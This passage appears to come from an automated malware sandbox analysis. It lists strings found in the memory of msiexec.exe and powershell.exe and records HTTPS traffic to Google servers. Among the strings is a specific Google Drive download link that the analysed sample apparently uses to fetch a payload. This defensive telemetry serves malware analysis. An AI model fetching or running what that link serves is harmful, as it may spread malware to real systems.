00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/3x
Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download#
Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download#J
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download%H
Source: msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download)7
Source: msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3020546903.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download-
Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download0J
Source: msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415571327.0000000009A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadD
Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadH
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadIN
Source: msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadR6
Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadY
Source: msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloaddK
Source: msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadgJ
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50022 version: TLS 1.2
